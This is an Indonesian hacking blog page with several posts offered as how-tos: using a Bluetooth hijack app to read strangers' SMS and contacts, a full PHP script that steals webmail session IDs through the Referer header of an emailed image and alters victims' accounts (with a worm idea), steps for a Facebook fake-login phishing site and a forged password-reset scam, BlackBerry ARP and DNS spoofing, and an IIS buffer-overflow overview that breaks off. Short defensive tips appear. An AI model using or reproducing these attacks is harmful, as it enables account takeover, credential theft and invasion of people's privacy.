This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Kamis, 15 November 2012

Cara Hacking Bluetooth

Assalamualaikum Wr,Wb
Saya Hadir lagi admin paling tampan sejagad raya B| mau share tentang
Hacking Bluetooth 2008 / 2009 – Bluetooth Hacking 2008 / 2009
Klo yang udah pernah gak usah protes, klo yang belum pernah monggo di coba..
( Ok Coy!! <- Gaya Budi Handuk ) Wkwkwkkw… Hijack This!
Huammzz.. Setelah beberapa hari ngikut cyberwar, jenuh juga rasanya hidup gw ini. We win again from Israel in cyberwar.. Uye!! Hehe, akhirnya gw buat sebuah ke isengan lagi. Nyoba nyoba isengin bluetooth orang..
Oke lah semuanya, gak usah banyak basa basi kita lanjut ke tahap selanjutnya..
Pertama loe harus Download dulu softwarenya, passwordnya ada di sampingnya:
Download Tipe Satu – Bluetooth ( Password: http://lucifer-doom.blogspot.com/ )
Download Tipe Dua – Harus Register Dulu Klo Mo DL ( Password: www.dl4all.com )
Download Tipe Tiga
Berikut ini contoh videonya:

Yang bisa di lakuin klo lu install software itu:
Bisa buka dan baca SMS
Bisa Buka Phone Book
Bisa Ganti Profile
Bisa Maenin RIngtone
Bisa Maenin MP3
Bisa Restart Dan Matiin HP
Bisa Ganti Volume
Bisa Ngeblock Phone
Bisa Pura2 Nelpon Dari HP
Dan lain lainnya ( Ampir semua fasilitas bisa )
Wkwkwkw.. Kan lumayan klo cuma mo iseng2in orang :P Lucunya klo di HP orang yang punya bluetooth itu ada yang simpen b*k*p.. Wkwkwkwkw.. Lucu abis dah, waktu itu gw ngakak, abis gw maenin film yang itu dari HP orang via bluetoothnya.. Orangnya ampe kaget kaget, mana di kampus lagi.. Hahaha..  ( *Jadi inget waktu itu.. Gyahahaha.. )

Instructions

1.) Klo device dah konek, gunakan 0000 sebagai codenya
2.) Bluetooth harus turned on, sebelum loe jalanin BT application.
3.) Gunain Mozilla Untuk Download Softwarenya. ( Jangan lupa: File aslinya adalah *.jar )
Instalasi pake USB cable ( Sony Ericcson ):
1. Konekin HP ma Computernya.
2. Mount sebagai disk.
3. Drag  (SuperBluetoothHack_v108.jar) ke /MSSEMC/Media files/other/ .
4. Disconnekin USB.
5. Lanjut ke Folder “Other” di HP loe.
6. Cari Aplikasinya, Trus “Install”.
Instalasi General ( Super Bluetooth Hack Version )
1. Download
2. Copy ke mobile
3. Jalanin Installernya ( incidentally need JAVA )
4. Klo itu semuanya ada, loe baru bisa jalanin itu software
5. Pilih bahasa dan silakan di configure
6. Click Connection
7. Click Search Devices
8. Pilih the “Victim”
9. And Manage <- Korban telah di victim..
Untuk yang lain juga gak jauh beda, masing masing HP ada kriterianya sendiri. Loe coba cobain dah satu satu klo gak bisa. Soalnya gw gak punya banyak tipe HP.. Wkwkwkwk..
Klo dah ke install, silakan cari mangsa bluetooth HP orang lain yang lagi aktif. Haha.. Jangan Lupa Bluetooth Loe Aktifin dolo sebelum menjalankan aplikasinya.. Oke.. Selamat mencoba.. Semoga loe senang :P

Hacking Email Telkom.net dan Plasa.com

Assalamualaikum Wr,Wb
Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.
Webmail Session Hijacking
Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.
Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.
SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:
  1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
  2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi: Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.
SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly. Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.
Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.
Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.

telkom.net URL

SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:
Stealing SessionID from Referer Header
Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.
Ketika pengunjung sedang membuka halaman dengan URL:
Kemudian ketika terjadi request ke sebuah file image:
Maka pada request GET tersebut akan ada header seperti di bawah ini:
1
2
3
4
5
6
7
8
9
10
11
12
0
1
2
3
4
5
6
7
8
9
10
11
GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1
Host: mail.telkom.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
Cache-Control: max-age=0
Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.
Attack Scenario
Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.
Preparing the Script
Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.
URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:
1
2
3
1
2
3
1
2
3
RewriteEngine On
RewriteBase /
RewriteRule mylab/image.jpg mylab/checkmail.php
Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
<?php
// Ambil header Referer
$ref = $_SERVER["HTTP_REFERER"];
$telkomnet = false;
$plasacom = false;
$width = 468;
$height = 100;
if (strpos($ref,“telkom.net”)>-1) {
$telkomnet = true;
}
if (strpos($ref,“plasa.com”)>-1) {
$plasacom = true;
}
if ($telkomnet===false && $plasacom===false) {
exit();
}$file = fopen(“daftarkorban.txt”,“a”);
$url_tokens = parse_url($ref);
$host = $url_tokens["host"];
$tokens = explode(“/”,$ref);
$sessid = $tokens[4];
fwrite($file,“######\n);
fwrite($file,“REFERER:”.$_SERVER["HTTP_REFERER"].\n);
fwrite($file,“SESSID:”.$sessid.\n);
$urlhost = “http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&”;
$inboxhtml = file_get_contents($urlhost);
preg_match(‘/<title>(.*?)<\/title>/i’, $inboxhtml, $matches);
$title=$matches[1];
$email = $title;
$pos = strpos($title,” “);
if ($pos > -1) {
$email = substr($title,0,$pos);
}
fwrite($file,“KORBAN:”.$email.\n);
fwrite($file,“******\n);
fclose($file);
$image = ImageCreate($width, $height);
$white = ImageColorAllocate($image, 255, 255, 255);
$black = ImageColorAllocate($image, 0, 0, 0);
$grey = ImageColorAllocate($image, 204, 204, 204);
ImageFill($image, 0, 0, $black);
ImageString($image, 3, 15, 5, $sessid, $white);
ImageString($image, 3, 25, 25, $email, $white);
// Writing Signature…
$url = http://mail.telkom.net/Session/$sessid/settings.wssp”;
if ($plasacom==true) {
$url = http://mail1.plasa.com/Session/$sessid/settings1.wssp”;
}
$old_settings = file_get_contents($url);
preg_match(‘/<textarea(.*?)>(.*?)<\/textarea>/i’, $old_settings, $matches);
$oldsig = $matches[2];
$data = array();
$data["UserFrom"] = $email;
$newsig = “[YOUR EMAIL HAS BEEN HACKED]“.$oldsig;
$data["Signature"] = $newsig;
$data["Update"] = “Update”;
$response = doPost($url,$data);
if ((strpos($response,“Updated”)>-1 && $telkomnet==true) || $plasacom==true) {
ImageString($image, 3, 35, 50, “Signature anda berhasil diganti menjadi:” , $white);
ImageString($image, 3, 45, 65, $newsig , $white);
}
header(“Content-Type: image/jpeg”);
ImageJpeg($image);
ImageDestroy($image);
function doPost($url,$data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
if(curl_errno($ch))
{
$response = curl_error($ch);
}
curl_close($ch);
return $response;
}
?>
Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.
Launch The Attack
Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.
Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.

signature1

Dan gambar berikut adalah gambar ketika email attacker tiba.

email attacker tiba

Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.

victim open email and his session hijacked instantly

Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.

signature2

Worm Attack: More Dangerous Scenario
Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.
Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.
Tips Menghindari Serangan
Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.
Semoga Bermanfaar

Sumber : Binus Hacker

Hack Facebook Dengan Fake Login

Assalamualaikum Wr,Wb
Admin Paling tampan mau share tentang Hack Facebook Dengan Fake Login. Hack Facebook Dengan Fake Login? Kenapa Tidak…
Jangan lupa sediain Hosting / Free Hosting untuk naruh script yang mau kita buat fake login lokasinya nanti. Jangan sampe lupa, karena itu hal yang paling wajib dilakukan!
Oke lanjut, mantapin juga dah. Perhatikan Baik² Dan Lakukan Dengan Benar Menurut Petunjuk Dibawah Ini. Jangan Sampe Ada Kekeliruan Sedikitpun! Berikut ini adalah ulasannya:
1. Pertama, bikin dulu sebuah file di hosting tempat anda mau bikin fake login dengan filetype: html. Kemudian kasi nama: “index.html“, sehingga di contoh URL Web adalah: http://www.hostingloedisini.com/facebook/index.html
Bikin Code Sesuai Dengan Contoh Script Dibawah Ini:
Scriptcode pada no 1:
Klick Disini Untuk Lihat Scriptnya
2. Buat file logs.php di hostingan lo sendiri, contoh http://www.hostingloedisini.com/facebook/logs.php di bawah ini script nya.
Scriptcode pada no 2:
Klick Disini Untuk Lihat Scriptnya
3. Jangan lupa dan wajib untuk membuat file kosong yg berformat txt dengan nama: logs.txt – jadi URLnya jadi: http://www.hostingloedisini.com/facebook/logs.txt
4. Ini wajib dan harus diingat! Jangan lupa change mode semua filenya, sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx) untuk Unix Server. Untuk masalah permission ini juga tergantung dari penyedia hosting, buat yang pake hosting gak nyediain change mode, langsung ajah dicoba tanpa memperhatikan poin ini & berdoa saja ini bisa berjalan.. Selain 777 explore permission bisa menjadi 775, 755 disesuaikan dengan server dan penyedia hosting anda.
5. Kemudian sebarkan URL yang telah loe buat, misal: “http://www.hostingloedisini.com/facebook/” dengan sesama user difacebook, iklan, atau spam lewat email sebanyak banyaknya. Bisa juga merajuk kepada cewe cewe / cowo cowo yang loe suka supaya klik tu login. Dijamin mantaf klo bisa dapetin username + loginnya! :D
6. Untuk melihat hasil login Username dan Passwordnya silakan buka file di logs.txt nya, nah klo ada username email beserta passwordnya. Brarti anda telah dapet login ntuh.
Contoh tampilan ujicoba aplikasi websitenya disini:
http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html

Selamat Mencoba, Semoga Berhasil..
Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar gak kna Fake Login:
1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. Kekekeke..

BlackBerry Hacking – Email & Facebook

Assalamualaikum Wr,Wb
Tahukan BlackBerry, tak lain adalah sebuah Handphone atau telepon Genggam yang kadang kala dapat membuat tangan kita menjadi “AUTIS” hehehe, ternyata dibalik kemewahannya perangkat yang satu ini bisa juga diserang (attack) dengan menggunakan jaringan wireless yang sudah disematkan pada generasi terbaru Blackberry. Dan serangan yang secara umun serangan dilakukan adalah via TCP/IP dengan menggunakan metode “arpspoof dab dnsspoof”.
Karena menurut beberapa ahli bahwa salah satu kelemahan sekaligus kekuatan Blackberry adalah adanya feature “proxying” yang hampir ada pada setiap device dari RIM ini, yang mana hampir secara keseluruhan layananan Blackberry baik itu e-mail (pushmail), browsing baik dari dan menuju perangkat Blackberry kita melalui server Blackberry (untuk kawasan ASIA PASIFIK) server berada ap.blackberry.com
6134_1129559517483_1182078273_30396283_6759743_nAda beberapa metode yang bisa mengakibatkan perangkat Blackberry di “Attack”.
1. ARP Spoofing :
Untuk dapat melakukan capture data melalui switches network, salah satu cara yang bisa dilakukan adalah dengan “meracuni/meng-inject” tabel ARP pada perangkat Blackberry yang dikenal sebagai ARP Spoofing yang bisa juga kita sebut sebagai metode ARP poisoning atau ARP poison routing. Tabel ARP inilah yang digunakan perangkat Blackberry untuk berkomunikasi dengan netwok device yang lain.
sebagai contoh, ketika seseorang mencoba untuk mengkoneksikan Blackberrynya ke salah satu wireless access point (WAP) hingga terhubung ke dalam jaringan, dan selanjutnya dengan menggunakan teknik serangn ARP spoofing guna meracuni tabel dalam ARP (internal) yang dimiliki oleh Blackberry, sehingga Blackberry yang telah diracuni berikut dengan server akan mengirim seluruh data dari dan menuju Blackberry yang diracuni melewati Blackberry “attacker” terlebih dulu.
Jika diilustrasikan kira sebagai berikut :
6134_1129563157574_1182078273_30396295_7612835_ndengan metode ini ternyata bahwa seluruh aliran data bisa diterima oleh “attacker” terlebih dulu melewati komputer yang telah diatur sebelumnya, dengan menggunakan tool’s Cain Abel yang mana applikasi ini juga secara otomatis menciptakan sertifikat palsu (fake) yang nantinya akan memalsukan sertifikat asli yang digunakan oleh ap.blackberry.com akan tetapi juga harus dingat bahwa seluruh koneksi akan di=”proxy” oleh rcp.ap.blackberry.com dan komunikasi akan menggunakan SSL :
6134_1129559677487_1182078273_30396287_5563037_nKemudian attacker dapat meng-capture traffic jaringan untuk dianalisa lebih lanjut, disamping itu biasanya attacker juga menggunakan program “Wireshark” untuk menampung data yang akan di decrypt menggunakan aplikasi lain yang disebut juga SSL**** , metode ini digunakan untuk mengubah data tersebut menjadi “cleartext” dengan menggunakan sertifikat palsu tentunya.
2. DNS Spoofing :
Metode kedua ini dilakukan dengan memanfaatkan topologi (peta/mapping) network model “proxying” yang digunakan Blackberry terhadap rcp.ap.blackberry.com. Dengan cara maka seluruh perangkat Blackberry yang mengunakan jaringan server regional (Asia Pasific) akan mengira bahwa server (WAP=wireless access point) yang telah diset oleh attacker sebagai server regional BIS “DNS Spoofing is the art of making a DNS to point to an another IP that it would be supposed to point to”
Ada beberapa langkah yang harus dilakukan oleh attacker pertama-tama dengan melakukan spoofing DNS entri dari server DNS (dengan menggunakan WAP, maka attacker akan masuk ke server dan menambahkan entri sebagai berikut rcp.ap.blackberry.com yang kemudian akan dikonfigurasi oleh komputer yang telah diset sebelumnya untuk melakukan “capture data, edit, serta manipulasi data”
Setelah berhasil menambahkan rcp.ap.blackberry.com maka dengan kata lain seluruh blackberry yang terkoneksi ke access point dan DNS tersebut akan dengan sukarela masuk ke dalam komputer attacker dan attacker akan mengkonfigurasi antara blackbery dengan server menggunakan SSL. Akan tetapi jika jeli maka saat melakukan browsing sementara blackberry sudah di “HacK” sebenarnya blackberry kita akan memberikan peringatan seperti ini :
6134_1129559797490_1182078273_30396290_8067343_nDisini attacker juga harus menggunakan “Stunnel” untuk menghubungkan komputer attacker dengan pengguna blackberry serta server rcp.ap.blackberry.com ini dimaksudkan agar aktifitas blackberry yang di “hack” tetap berlangsung dengan menggunakan SSL tentunya dengan menggunakan sertifikat palsu yang sudah dibuat sebelumnya.
Biasanya Attacker juga menggunakan Blackbag untuk menghubungkan pengguna blackberry ke server sesungguhnya yang telah diubah kedalam “plaintext” kira-kira seperti ini :
Dan pada akhirnya PIN pengirim sekaligus penerima terkirim plaintext dan memungkinkan attacker untuk mendapatkan informasi baik itu berupa e-mail, browsing, chat dan juga waktu aktifikas pengguna blackberrypun bisa diketahui oleh attacker. PIN yang “tidak dapat diubah” mengakibatkan pemilik PIN asli dapat dengan mudah diserang seperti halnya “denial of service serta abuse” dari attacker atau kira-kira seperti ini
“Blackberry PIN is an eight character hexadecimal identification number assigned to each Blackberry device. PINS cannot be changed and are locked to each handset. Blackberrys can message each other using the PIN directly or by using the Blackberry Messenger application”.

Hacking Facebook Dengan Forgot Password

Assalamualaikum Wr,Wb
Kali ini admin paling tampan mau share pengalaman tentang hack account facebook bukan hack facebook kalo hack facebook mah saya gak bisa :D , udah tanpa banyak basa basi langsung saja ke TKP ingat bukan OVJ.
Banyak cara untuk mencuri username/email dan password untuk login account facebook. Diantaranya dengan cara berikut ;
  1. Buat email palsu dengan domain yang meyakinkan dan bukan gratisan seperti yahoomail dan googlemail. (Contoh nyata ; ****@backd00red.org)
  2. Cari email target, kita dapat mencari daftar email melaui banyak cara, dan yang paling amatir adalah lewat google atau untuk percobaan, pakai saja email teman kamu.
  3. Setelah mendapatkan email yang terdaftar di facebook, buka halaman login facebook.
  4. Pilih link forget password, reset password, atau change email address, atau yang sejenis.
  5. Kirimkan pada email target. Usahakan email tersebut mirip dan disertai dengan signature / tertanda team facebook. Contohnya :
  6. Lanjut, Email di atas menawarkan konfirmasi asosiasi (hubungan) account dengan email yang kita miliki. Jika target menerima dan mengikuti link yang kita berikan di atas. Maka password lama atau baru akan dikirim ke email kita, bukan lagi pada email si pemilik asli alias target.
  7. Done. Kita mendapatkan passwordnya.
Selamat Mencoba

Hacking Dengan IIS

Assalamualaikum Wr,Wb
Saya Admin Paling tampan sejagad raya mau nyindir orang-orang luar yang sok tau :)

1) Pendahuluan
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
2) Adanya Celah Keamanan
Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
